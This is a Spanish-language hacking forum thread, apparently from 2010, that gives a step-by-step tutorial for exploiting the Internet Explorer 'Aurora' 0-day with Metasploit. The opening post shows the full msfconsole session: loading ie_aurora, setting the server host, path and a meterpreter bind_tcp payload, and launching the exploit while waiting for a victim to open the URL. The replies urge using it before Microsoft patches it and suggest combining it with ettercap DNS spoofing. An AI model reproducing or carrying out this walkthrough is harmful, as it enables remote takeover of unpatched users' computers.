[Metasploit + 0-day IE] Exploit IE_Aurora

Iniciado por Shell Root, 19 Enero 2010, 22:48 PM

0 Miembros y 2 Visitantes están viendo este tema.

Shell Root

[Metasploit + 0-day IE] Exploit IE_Aurora




Descargad el Exploit IE_Aurora.rb de http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb. Ponemos el Exploit dentro de la carpeta que nos de la gana, yo la puse en Windows/Browser/Ie_Aurora. Ingresamos a la Consola del Metasploit y cargamos el Exploit Ie_Aurora

                                 _       _
            _                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                          |_|


      =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
      =[ svn r7957 updated 27 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 27 days ago.
        We recommend that you update the framework at least every other day.
        For information on updating your copy of Metasploit, please see:
            http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) >


Miramos que opciones tiene y cuales son requeridos
msf exploit(ie_aurora) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(ie_aurora) >


Llenamos los parametros de SRVHOST, URIPATH y Seleccionamos el PAYLOAD.
msf exploit(ie_aurora) > set SRVHOST 192.168.0.2
SRVHOST => 192.168.0.2
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) >


Lanzamos el Exploit y esperamos a que la victima ingrese a la URL.
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.0.2:8080/
[*] Server started.


Video:
[youtube=425,350]http://www.youtube.com/watch?v=4o8UPTEU_Uo[/youtube]

Se debe a: a que cuando un usuario carga manualmente un sitio Web, código ‭‬javascript especialmente conformado provoca una corrupción de memoria que en última instancia permite el acceso al sistema. Esta vulnerabilidad es extremadamente crítica, y el código lleva circulando libremente por Internet desde hace un par de días, lo que hace más que posible que el exploit, que en principio se diseñó para el robo de propiedad intelectual en un ataque segmentado contra grandes corporaciones, pueda estar explotándose de un modo más generalista.

Fuente: http://www.sahw.com/wp/archivos/2010/01/16/sobre-la-ultima-vulnerabilidad-de-internet-explorer-consejos-practicos-para-usuarios/
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Banti

Muy interesante....

Seguramente en estos dias pruebo el metasploit...

alexkof158

fuck men la botastes, como siempre sancado buenos tutos
Felicitacionesss :D
"noproxy"

ikary

Para este ataque es necesario que la victima se conecte mediante IE?

Shell Root

Cita de: ikary en 20 Enero 2010, 20:44 PM
Para este ataque es necesario que la victima se conecte mediante IE?
Joder, Si el 0Day es de Microsoft, más especificamente en el producto Internet Explorer, tu que crees?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

ikary

#5
Joer, y luego me quejo de la gente que pregunta por preguntar, y soy yo el primero en hacerlo.   :¬¬

Pido perdon por la pregunta ESTUPIDA  :silbar: es que estoy en clase y me aburro XD

Cabe destacar que ataques como este junto con dns_spoof de ettercap por ejemplo funcionan a las mil maravillas. ---> http://foro.elhacker.net/hacking_avanzado/ettercapmetasploit_suplantacion_de_identidad_por_nombre_de_dominio_spoofing-t280675.0.html

Un saludo

Shell Root

Ajam, Ademas el 0Day solo sacaran parche hasta Feb (Eso lei por ahi). Así que venga tio, a darle duro!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

dimitrix

Sorry, ya que de Exploit es algo que nunca toqué, pregunto:

Ingresamos a la Consola del Metasploit

y de donde coño saco la consola con el metasploit?




Shell Root

Linux: ./msfconsole
Windows: msfconsole.bat
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

darkgx

Hola, acabo de bajar el ie_aurora y lo puse en mi carpeta Windows/exploits/ y cuando pongo

use windows/exploits/ie_aurora
me dice
Failed to load module: windows/exploits/ie_aurora
no se porque pasa... me podrian ayudar?

Mi O.S: Win Vista